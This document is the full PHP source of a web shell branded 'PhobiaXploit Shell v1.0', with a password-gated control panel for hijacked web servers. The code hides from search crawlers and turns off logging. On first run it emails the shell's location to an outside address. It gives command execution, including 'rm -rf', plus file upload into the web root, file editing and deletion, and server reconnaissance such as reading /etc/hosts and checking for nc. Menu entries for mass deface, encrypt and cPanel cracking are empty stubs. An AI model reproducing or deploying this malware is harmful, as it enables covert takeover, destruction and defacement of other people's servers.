Coming Soon Kontol

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. set_magic_quotes_runtime(0);
6. clearstatcache();
7. ini_set('error_log', NULL);
8. ini_set('log_errors', 0);
9. ini_set('max_execution_time', 0);
10. ini_set('output_buffering', 0);
11. ini_set('display_errors', 0);
12.  
13. $password = "b7d6b1fdee9c53cb1d7fd096921db1a6"; // default: phobiaxploit
14.  
15. if (!empty($_SERVER['HTTP_USER_AGENT'])) {
16. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
17. if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
18. header('HTTP/1.0 404 Not Found');
19. exit;
20. }
21. }
22.  
23. function login() {
24. ?>
25. <!--
26. ##################################################
27. PHOBIAXPLOIT SHELL VERSION 1.0
28. THANKS YANG UDAH BANTU SELAMA PEMBUATAN SHELL INI
29. TANPA KALIAN MUNGKIN SHELL INI GAK BAKAL JADI
30. ##################################################
31. -->
32. <!DOCTYPE html>
33. <html lang="en">
34. <head>
35. <meta charset="UTF-8">
36. <meta name='author' content='PhobiaXploit'>
37. <meta charset="UTF-8">
38. <title>PHOBIAXPLOIT SHELL v.1</title>
39. <link href="http://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet" type="text/css"/>
40. <style type="text/css">
41. * {cursor: url(http://ani.cursors-4u.net/cursors/cur-13/cur1159.ani), url(http://ani.cursors-4u.net/cursors/cur-13/cur1159.png), auto !important;}
42. html {
43. margin: 20px auto;
44. background: #000000;
45. color: red;
46. text-align: center;
47. }
48. header {
49. color: #2F4F4F;
50. margin: 10px auto;
51. }
52. input[type=password] {
53. color: red;
54. background: transparent;
55. border: 1px solid white;
56. border-top: 2px solid red;
57. text-align: center;
58. box-shadow: 1px 1px 0px red;
59. }
60. input[type=password]:hover {
61. color: red
62. background: transparent;
63. border: 1px solid white;
64. border-top: 2px solid red;
65. text-align: center;
66. box-shadow: 1px 1px 0px red;
67. }
68. </style>
69.  
70. </head>
71. <body>
72. <br><br><br>
73. <span style='color: rgb(127, 127, 126);'><br> <span style='font-family: monospace;'> <center><style type="text/css">body { font-family: 'Amatic SC'; color: white; padding: 0; margin: 0; background-image: url(''); background-repeat:no-repeat; background-position:center; background-size: 100% 100%; } { 0% { opacity: 1.0; } 50% { opacity: 0.0; } 100% { opacity: 1.0; } } img { opacity: 0.8; } img { animation-name: rotate ; animation-duration: 7s; animation-play-state: running; animation-timing-function: linear; animation-iteration-count: infinite; opacity: 1.0; filter: alpha(opacity=50); } img:hover { opacity: 1.0;filter: alpha(opacity=100); } @keyframes rotate{ 10% {transform:rotateY(36deg)} 20% {transform:rotateY(72deg)} 30% {transform:rotateY(108deg)} 40% {transform:rotateY(144deg)} 50% {transform:rotateY(180deg)} 60% {transform:rotateY(216deg)} 70% {transform:rotateY(252deg)} 80% {transform:rotateY(288deg)} 90% {transform:rotateY(324deg)} 100% {transform:rotateY(360deg)} } </style><img style="width: 200px;" src='https://3.bp.blogspot.com/-y7Z74tfxNQE/W7eaJH-VEnI/AAAAAAAAATg/3BFlnuFOuPUF0_iS28bZCN-LJYER7jzBgCLcBGAs/s320/36c743d5-810c-4aa4-8a29-e00b50d55ecb.jpg'>
74. <hr size="3" color="red"> <center><font face="CONSOLAS" size="8" color="red">PHOBIA<font face="CONSOLAS" size="8" color="white">XPLOIT</font></font></center>
75. <center><font color="white" size="5" face="tahoma"><b>Look For Something That Is Impossible</b></font></center>
76. <p></p>
77. <form method="POST">
78. <input type="password" name="pass">
79. </form>
80. <br>
81. <hr size="3" color="red">
82.  
83. </body>
84. </html>
85. <?php
86. exit;
87. }
88.  
89. if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
90. if (empty($password) || (isset($_POST['pass']) && (md5($_POST['pass']) == $password))) {
91. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
92. } else {
93. login();
94. }
95. }
96.  
97. if (file_exists('.db'))
98. { } else {
99. $to = "[email protected]";
100. $subject = $_SERVER['SERVER_NAME'];
101. $header = "From: Mastah <[email protected]>";
102. $header .= "MIME-Version: 1.0\r\n";
103. $header .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
104. $message = "<font face='tahoma' color='red' size='8'>Akses Shell : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'] . "</font>";
105. mail($to, $subject, $message, $header);
106. $m = fopen(".db", "w") or die (" ");
107. $txt = "";
108. fwrite($m, $txt);
109. fclose($m);
110. chmod(".db",0644); }
111.  
112. ?>
113.  
114. <!doctype html>
115. <html lang="en">
116.  
117. <head>
118.  
119. <!-- Required meta tags -->
120. <meta charset="utf-8">
121. <meta name="viewport" content="width=device-width, initial-scale=1">
122.  
123. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css">
124. <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
125. <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js"></script>
126. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
127.  
128. <title>PHOBIAXPLOIT SHELL</title>
129. <style type="text/css">
130. * {cursor: url(http://ani.cursors-4u.net/cursors/cur-13/cur1159.ani), url(http://ani.cursors-4u.net/cursors/cur-13/cur1159.png), auto !important;}
131. body {
132. background: url("https://dwijatmiko.files.wordpress.com/2010/08/wallpaper_13941.jpg") no-repeat center center fixed;
133. -webkit-background-size: cover;
134. -moz-background-size: cover;
135. background-size: cover;
136. -o-background-size: cover;
137. }
138. hr {
139. border-top: 3px solid red !important;
140. }
141.  
142. .a-gaya {
143. padding: 2px 10px !important;
144. margin: 0 !important;
145. background: black !important;
146. text-decoration: none !important;
147. letter-spacing: 2px !important;
148. padding: 2px 10px !important;
149. margin: 0 !important;
150. background: black !important;
151. text-decoration: none !important;
152. letter-spacing: 2px !important;
153. border-radius: 2px !important;
154. border-top: 2px solid darkred !important;
155. border-bottom: 2px solid darkred !important;
156. border-right: 2px solid red !important;
157. border-left: 2px solid red !important;
158. font-family: CONSOLAS !important;
159. }
160.  
161. .a-gaya:hover {
162. background: #180000 !important;
163. border-right: 0px solid #333333 !important;
164. border-left: 0px solid #333333 !important;
165. }
166.  
167. .footer {
168. position: fixed;
169. left: 0;
170. bottom: 0;
171. width: 100%;
172. background-color: darkred;
173. color: white;
174. text-align: center;
175. }
176.  
177. .btn {
178. margin-top: 10px !important;
179. }
180. .card {
181. border: none;
182. }
183. .linkdir {
184. color: #fff;
185.  
186. }
187. .linkdir:hover {
188. color: #fff;
189.  
190. }
191. .text-merah {
192. color: red;
193. }
194. .aksi-table:hover {
195. background-color: #8b0000;
196. }
197. .btn-redark {
198. color: #fff;
199. background-color: #8b0000;
200. border-color: #8b0000;
201.  
202. }
203. body::-webkit-scrollbar {
204. width: 1em;
205. }
206.  
207. body::-webkit-scrollbar-track {
208. -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
209. }
210.  
211. body::-webkit-scrollbar-thumb {
212. background-color: #8b0000;
213. outline: 1px solid slategrey;
214. }
215. </style>
216. </head>
217.  
218. <body>
219.  
220. <h1 class="text-white text-center">PHOBIA<font color="red" size="10"><b>X</b></font>PLOIT</h1>
221. <h5 class="text-merah text-center">Look For Something That Is Impossible</h5>
222. <hr />
223. <?php
224. if (isset($_GET['dir'])) {
225. $dir = $_GET['dir'];
226. chdir($dir);
227. } else {
228. $dir = getcwd();
229. }
230. $kernel = php_uname();
231. $ip = gethostbyname($_SERVER['HTTP_HOST']);
232. $dir = str_replace("\\", "/", $dir);
233. $scdir = explode("/", $dir);
234. $freespace = hdd(disk_free_space("/"));
235. $total = hdd(disk_total_space("/"));
236. $used = $total - $freespace;
237. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
238. $ds = @ini_get("disable_functions");
239. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
240. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
241. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
242. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
243. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
244. $show_ds = (!empty($ds)) ? "<font color=white>$ds</font>" : "<font color=lime>NONE</font>";
245. if (!function_exists('posix_getegid')) {
246. $user = @get_current_user();
247. $uid = @getmyuid();
248. $gid = @getmygid();
249. $group = "?";
250. } else {
251. $uid = @posix_getpwuid(posix_geteuid());
252. $gid = @posix_getgrgid(posix_getegid());
253. $user = $uid['name'];
254. $uid = $uid['uid'];
255. $group = $gid['name'];
256. $gid = $gid['gid'];
257. }
258. echo "<center><font color='white' face='tahoma'>";
259. echo "<font face='CONSOLAS' size='3'>";
260. echo "<td>System: <font color=lime>" . $kernel . "</font><br>";
261. echo "User: <font color=lime>" . $user . "</font> (" . $uid . ") Group: <font color=lime>" . $group . "</font> (" . $gid . ")<br>";
262. echo "Server IP: <font color=lime>" . $ip . "</font> | Your IP: <font color=lime>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
263. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
264. echo "Safe Mode: $sm<br>";
265. echo "Disable Functions: $show_ds<br>";
266. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br></td><td></td><td></td>";
267. echo "<hr>";
268. echo '
269.  
270. <center>
271. <a class="btn text-white a-gaya" href="?home" role="button">Home</a>
272. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Command</a>
273. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&action=upload" role="button">Upload</a>
274. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Mass Deface</a>
275. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Mass Delete</a>
276. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Mass Encrypt</a>
277. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&action=adminer" role="button">Adminer</a>
278. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Config</a>
279. <a class="btn text-white a-gaya" rhref="?dir=' . $dir . '&" role="button">Symlink</a>
280. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Jumping</a>
281. <p></p>
282. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Fake Root</a>
283. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Cpanel Crack</a>
284. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Script Encode</a>
285. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Password Hash</a>
286. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&" role="button">Patebin</a>
287. <a class="btn text-white a-gaya" href="?dir=' . $dir . '&action=info_server" role="button">Info Server</a>
288. <a class="btn text-white a-gaya" href="?logout=true" role="button">Logout</a>
289. </center>
290. <hr>
291.  
292. ';
293.  
294. if (get_magic_quotes_gpc()) {
295.  
296. function idx_ss($array) {
297. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
298. }
299.  
300. $_POST = idx_ss($_POST);
301. $_COOKIE = idx_ss($_COOKIE);
302. }
303.  
304. if (isset($_GET['dir'])) {
305. $dir = $_GET['dir'];
306. chdir($dir);
307. } else {
308. $dir = getcwd();
309. }
310.  
311. $dir = str_replace("\\", "/", $dir);
312. $scdir = explode("/", $dir);
313.  
314.  
315. echo "<center>";
316. echo "<font color=white>Current DIR: ";
317. foreach ($scdir as $c_dir => $cdir) {
318. echo "<a class='linkdir' href='?dir=";
319. for ($i = 0; $i <= $c_dir; $i++) {
320. echo $scdir[$i];
321. if ($i != $c_dir) {
322. echo "/";
323. }
324. }
325. echo "'>$cdir</a>/";
326. }
327. echo "&nbsp;&nbsp;[ " . w($dir, perms($dir)) . " ] <br><br>";
328. echo "</font></center>";
329.  
330.  
331. // table action
332.  
333. if($_GET["px"] == "newfile")
334. {
335. if($_POST['new_save_file']) {
336. $newfile = htmlspecialchars($_POST['newfile']);
337. $fopen = fopen($newfile, "a+");
338. if($fopen) {
339. $act = "<script>window.location='?px=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
340. } else {
341. $act = "<font color=red>permission denied</font>";
342. }
343. }
344. echo $act;
345. echo "
346. <div class='container'>
347. <div class='row'>
348. <div class='col-md-2'></div>
349. <div class='col-md-7'>
350. <form class='form-inline' method='post'>
351. <div class='form-group '>
352. <label for='file'>File name:</label>
353. <input class='form-control' type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' id='file'>
354. </div>
355. <input class='btn btn-redark' type='submit' name='new_save_file' value='Submit' style='margin-bottom: 10px; margin-left:10px;'>
356. </form>
357. </div>
358. </div>
359. </div>
360. ";
361.  
362. }
363. elseif($_GET['px'] == 'delete_dir') {
364. if(is_dir($dir)) {
365. if(is_writable($dir)) {
366. @rmdir($dir);
367. @exe("rm -rf $dir");
368. @exe("rmdir /s /q $dir");
369. $px = "<script>window.location='?dir=".dirname($dir)."';</script>";
370. } else {
371. $px = "<font color=red>could not remove ".basename($dir)."</font>";
372. }
373. }
374. echo $px;
375. } elseif($_GET["action"] == "command") //action table
376. {
377.  
378. } elseif ($_GET["action"] == "upload") {
379. echo "<center>";
380. if($_POST['upload']) {
381. if($_POST['tipe_upload'] == 'biasa') {
382. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
383. $act = "<br><font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
384. } else {
385. $act = "<font color=red>failed to upload file</font>";
386. }
387. } else {
388. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
389. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
390. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
391. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
392. $act = "<br><font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
393. } else {
394. $act = "<font color=red>failed to upload file</font>";
395. }
396. } else {
397. $act = "<font color=red>failed to upload file</font>";
398. }
399. }
400. }
401. echo "Upload File:
402. <form method='post' enctype='multipart/form-data'>
403. <input type='radio' name='tipe_upload' value='biasa' checked />Biasa [ ".w($dir,"Writeable")." ]
404. <input type='radio' name='tipe_upload' value='home_root' />home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br><br>
405. <input class='btn btn-redark' type='file' name='ix_file'><br>
406. <input class='btn btn-redark' type='submit' value='upload' name='upload'>
407. </form>";
408. echo $act;
409. echo "</center>";
410. } elseif ($_GET["action"] == "mass_deface") {
411. # code...
412. } elseif ($_GET["action"] == "mass_delete") {
413. # code...
414. } elseif ($_GET["action"] == "mass_encrypt") {
415. # code...
416. } elseif ($_GET["action"] == "adminer") {
417. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
418. if (file_exists('adminer.php')) {
419. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
420. } else {
421. if (adminer("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php")) {
422. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
423. } else {
424. echo "<center><font color=red>gagal buat file adminer</font></center>";
425. }
426. }
427. } elseif ($_GET["action"] == "config") {
428. # code...
429. } elseif ($_GET["action"] == "symlink") {
430. # code...
431. } elseif ($_GET["action"] == "jumping") {
432. # code...
433. } elseif ($_GET["action"] == "fake root") {
434. # code...
435. } elseif ($_GET["action"] == "cpanel crack") {
436. # code...
437. } elseif ($_GET["action"] == "script encode") {
438. # code...
439. } elseif ($_GET["action"] == "password hash") {
440. # code...
441. } elseif ($_GET["action"] == "info_server") {
442. echo "<div id=result style='color:lime;'>
443. <h2>Info Server</h2> <br /><br />
444. <br> OS: <a style='color:lime;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".php_uname(s)."'>".php_uname(s)."</td></tr>
445. <br> PHP Version : <a style='color:lime;text-decoration:none;' target=_blank href='?phpinfo'>".phpversion().".</td></tr>
446. <br> Kernel Release : <font color=lime>".php_uname(r)."</font>
447. <br> Kernel Version : <font color=lime>".php_uname(v)."</font>
448. <br>Machine : <font color=lime>".php_uname(m)."</font>
449. <br>Server Software : <font color=lime>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
450. if(function_exists('apache_get_modules'))
451. {
452. echo "Loaded Apache modules : <br /><br /><font color=>lime";
453. echo implode(', ', apache_get_modules());
454. echo "</font></tr></td>";
455. }
456. if($os=='win')
457. {
458. echo "Account Setting : <font color=lime><pre>".cmd('net accounts')."</pre>
459. User Accounts : <font color=lime><pre>".cmd('net user')."</pre>
460. ";
461. }
462. if($os=='nix')
463. {
464. echo "Distro : <font color=lime><pre>".cmd('cat /etc/*-release')."</pre></font>
465. Distr name : <font color=lime><pre>".cmd('cat /etc/issue.net')."</pre></font>
466. GCC : <font color=lime><pre>".cmd('whereis gcc')."</pre>
467. PERL : <font color=lime><pre>".cmd('whereis perl')."</pre>
468. PYTHON : <font color=lime><pre>".cmd('whereis python')."</pre>
469. JAVA : <font color=lime><pre>".cmd('whereis java')."</pre></td></tr>
470. APACHE : <font color=lime><pre>".cmd('whereis apache')."</pre></td></tr>
471. CPU : <br /><br /><pre><font color=lime>".cmd('cat /proc/cpuinfo')."</font></pre></td></tr>
472. RAM : <font color=lime><pre>".cmd('free -m')."</pre></td></tr>
473. User Limits : <br /><br /><font color=lime><pre>".cmd('ulimit -a')."</pre></td></tr>";
474. $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
475. $uze=array();
476. foreach($useful as $uzeful)
477. {
478. if(cmd("which $uzeful"))
479. {
480. $uze[]=$uzeful;
481. }
482. }
483. echo " Useful : <br /><font color=lime><pre>";
484. echo implode(', ',$uze);
485. echo "</pre></td></tr>";
486. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
487. $uze=array();
488. foreach($downloaders as $downloader)
489. {
490. if(cmd("which $downloader"))
491. {
492. $uze[]=$downloader;
493. }
494. }
495. echo " Downloaders : <br /><font color=lime><pre>";
496. echo implode(', ',$uze);
497. echo "</pre></td></tr>";
498. echo " Users : <br /><font color=lime><pre>".wordwrap(get_users())."</pre</font>></td></tr>
499. Hosts : <br /><font color=lime><pre>".cmd('cat /etc/hosts')."</pre></font></td></tr>";
500. }
501. echo " <br /><br /> <br /><br />";
502. }
503. elseif ($_GET['logout'] == true) {
504. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
505. echo "<script>window.location='?';</script>";
506. } else {
507. if (is_dir($dir)) {
508. if (!is_readable($dir)) {
509. echo "<font color=red>can't open directory. ( not readable )</font>";
510. } else {
511.  
512. echo "<div class='table-responsive'>
513. <table class='table table-bordered'>
514. <thead>
515. <tr class='aksi-table'>
516. <th class='text-center text-merah'>Name</th>
517. <th class='text-center text-merah'>Type</th>
518. <th class='text-center text-merah'>Size</th>
519. <th class='text-center text-merah'>Last</th>
520. <th class='text-center text-merah'>Owner/Grup</th>
521. <th class='text-center text-merah'>Permission</th>
522. <th class='text-center text-merah'>action</th>
523.  
524. </tr>
525. </thead>";
526. $scandir = scandir($dir);
527. foreach ($scandir as $dirx) {
528. $dtype = filetype("$dir/$dirx");
529. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
530. if (function_exists('posix_getpwuid')) {
531. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
532. $downer = $downer['name'];
533. } else {
534. //$downer = $uid;
535. $downer = fileowner("$dir/$dirx");
536. }
537. if (function_exists('posix_getgrgid')) {
538. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
539. $dgrp = $dgrp['name'];
540. } else {
541. $dgrp = filegroup("$dir/$dirx");
542. }
543. if (is_file("$dir/$dirx")) {
544. continue;
545. }
546. if ($dirx === '..') {
547. $href = "<a href='?dir=" . dirname($dir) . "' class='linkdir'>$dirx</a>";
548. } elseif ($dirx === '.') {
549. $href = "<a href='?dir=' . $dir . '' class='linkdir'>$dirx</a>";
550. } else {
551. $href = "<a href='?dir=' . $dir . '/$dirx' class='linkdir'>$dirx</a>";
552. }
553. if ($dirx === '.' || $dirx === '..') {
554. $act_dir = "<a href='?px=newfile&dir=$dir' class='linkdir'>newfile</a> | <a href='?px=newfolder&dir=$dir' class='linkdir'>newfolder</a>";
555. } else {
556. $act_dir = "<a href='?px=rename_dir&dir=$dir/$dirx' class='linkdir'>rename</a> | <a href='?px=delete_dir&dir=$dir/$dirx' class='linkdir'>delete</a>";
557. }
558. echo "<tbody><tr class='aksi-table'>";
559. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA" . "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp" . "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
560. echo "<td><center><font color=white>$dtype</font></center></td>";
561. echo "<td><center><font color=white>-</font></center></th></td>";
562. echo "<td><center><font color=white>$dtime</font></center></td>";
563. echo "<td><center><font color=white>$downer/$dgrp</font></center></td>";
564. echo "<td><center><font color=white>" . w("$dir/$dirx", perms("$dir/$dirx")) . "</font></center></td>";
565. echo "<td style='padding-left: 15px;'><font color=white>$act_dir</font></td>";
566. echo "</tr></tbody>";
567. }
568. }
569. } else {
570. echo "<font color=red>can't open directory.</font>";
571. }
572. foreach ($scandir as $file) {
573. $ftype = filetype("$dir/$file");
574. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
575. $size = filesize("$dir/$file") / 1024;
576. $size = round($size, 3);
577. if (function_exists('posix_getpwuid')) {
578. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
579. $fowner = $fowner['name'];
580. } else {
581. //$downer = $uid;
582. $fowner = fileowner("$dir/$file");
583. }
584. if (function_exists('posix_getgrgid')) {
585. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
586. $fgrp = $fgrp['name'];
587. } else {
588. $fgrp = filegroup("$dir/$file");
589. }
590. if ($size > 1024) {
591. $size = round($size / 1024, 2) . 'MB';
592. } else {
593. $size = $size . 'KB';
594. }
595. if (is_dir("$dir/$file")) {
596. continue;
597. }
598.  
599. echo "<tbody><tr class='aksi-table'>";
600. echo "<td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?px=view&dir=$dir&file=$dir/$file' class='linkdir'>$file</a></td>";
601. echo "<td><center><font color=white>$ftype</font></center></td>";
602. echo "<td><center><font color=white>$size</font></center></td>";
603. echo "<td><center><font color=white>$ftime</font></center></td>";
604. echo "<td><center><font color=white>$fowner/$fgrp</font></center></td>";
605. echo "<td><center><font color=white>" . w("$dir/$file", perms("$dir/$file")) . "</font></center></td>";
606. echo "<td style='padding-left: 15px;'><a href='?px=edit&dir=$dir&file=$dir/$file' class='linkdir'>edit</a> | <a href='?px=rename&dir=$dir&file=$dir/$file' class='linkdir'>rename</a> | <a href='?px=delete_dir&dir=$dir&file=$dir/$file' class='linkdir'>delete</a> | <a href='?px=download&dir=$dir&file=$dir/$file' class='linkdir'>download</a></td>";
607. echo "</tr></tbody>";
608. }
609. echo "</table></div>";
610. }
611. ?>
612. <br>
613. <br>
614. <br>
615. <footer class="footer">
616. <div class="container">
617. <span class="text-white">Copyright &copy; 2018 - PhobiaXploit</a></span>
618. </div>
619. </footer>
620. </body>
621.  
622. </html>
623. <?php
624.  
625. function hdd($s) {
626. if ($s >= 1073741824) {
627. return sprintf('%1.2f', $s / 1073741824) . ' GB';
628. } elseif ($s >= 1048576) {
629. return sprintf('%1.2f', $s / 1048576) . ' MB';
630. } elseif ($s >= 1024) {
631. return sprintf('%1.2f', $s / 1024) . ' KB';
632. } else {
633. return $s . ' B';
634. }
635. }
636.  
637. function exe($cmd) {
638. if (function_exists('system')) {
639. @ob_start();
640. @system($cmd);
641. $buff = @ob_get_contents();
642. @ob_end_clean();
643. return $buff;
644. } elseif (function_exists('exec')) {
645. @exec($cmd, $results);
646. $buff = "";
647. foreach ($results as $result) {
648. $buff .= $result;
649. } return $buff;
650. } elseif (function_exists('passthru')) {
651. @ob_start();
652. @passthru($cmd);
653. $buff = @ob_get_contents();
654. @ob_end_clean();
655. return $buff;
656. } elseif (function_exists('shell_exec')) {
657. $buff = @shell_exec($cmd);
658. return $buff;
659. }
660. }
661.  
662. function perms($file) {
663. $perms = fileperms($file);
664. if (($perms & 0xC000) == 0xC000) {
665. // Socket
666. $info = 's';
667. } elseif (($perms & 0xA000) == 0xA000) {
668. // Symbolic Link
669. $info = 'l';
670. } elseif (($perms & 0x8000) == 0x8000) {
671. // Regular
672. $info = '-';
673. } elseif (($perms & 0x6000) == 0x6000) {
674. // Block special
675. $info = 'b';
676. } elseif (($perms & 0x4000) == 0x4000) {
677. // Directory
678. $info = 'd';
679. } elseif (($perms & 0x2000) == 0x2000) {
680. // Character special
681. $info = 'c';
682. } elseif (($perms & 0x1000) == 0x1000) {
683. // FIFO pipe
684. $info = 'p';
685. } else {
686. // Unknown
687. $info = 'u';
688. }
689. // Owner
690. $info .= (($perms & 0x0100) ? 'r' : '-');
691. $info .= (($perms & 0x0080) ? 'w' : '-');
692. $info .= (($perms & 0x0040) ?
693. (($perms & 0x0800) ? 's' : 'x' ) :
694. (($perms & 0x0800) ? 'S' : '-'));
695. // Group
696. $info .= (($perms & 0x0020) ? 'r' : '-');
697. $info .= (($perms & 0x0010) ? 'w' : '-');
698. $info .= (($perms & 0x0008) ?
699. (($perms & 0x0400) ? 's' : 'x' ) :
700. (($perms & 0x0400) ? 'S' : '-'));
701. // World
702. $info .= (($perms & 0x0004) ? 'r' : '-');
703. $info .= (($perms & 0x0002) ? 'w' : '-');
704. $info .= (($perms & 0x0001) ?
705. (($perms & 0x0200) ? 't' : 'x' ) :
706. (($perms & 0x0200) ? 'T' : '-'));
707. return $info;
708. }
709.  
710. function w($dir, $perm) {
711. if (!is_writable($dir)) {
712. return "<font color=red>" . $perm . "</font>";
713. } else {
714. return "<font color=lime>" . $perm . "</font>";
715. }
716. }
717.  
718. function r($dir, $perm) {
719. if (!is_readable($dir)) {
720. return "<font color=red>" . $perm . "</font>";
721. } else {
722. return "<font color=lime>" . $perm . "</font>";
723. }
724. }
725.  
726.  
727. function adminer($url, $isi) {
728. $fp = fopen($isi, "w");
729. $ch = curl_init();
730. curl_setopt($ch, CURLOPT_URL, $url);
731. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
732. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
733. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
734. curl_setopt($ch, CURLOPT_FILE, $fp);
735. return curl_exec($ch);
736. curl_close($ch);
737. fclose($fp);
738. ob_flush();
739. flush();
740. }
741. ?>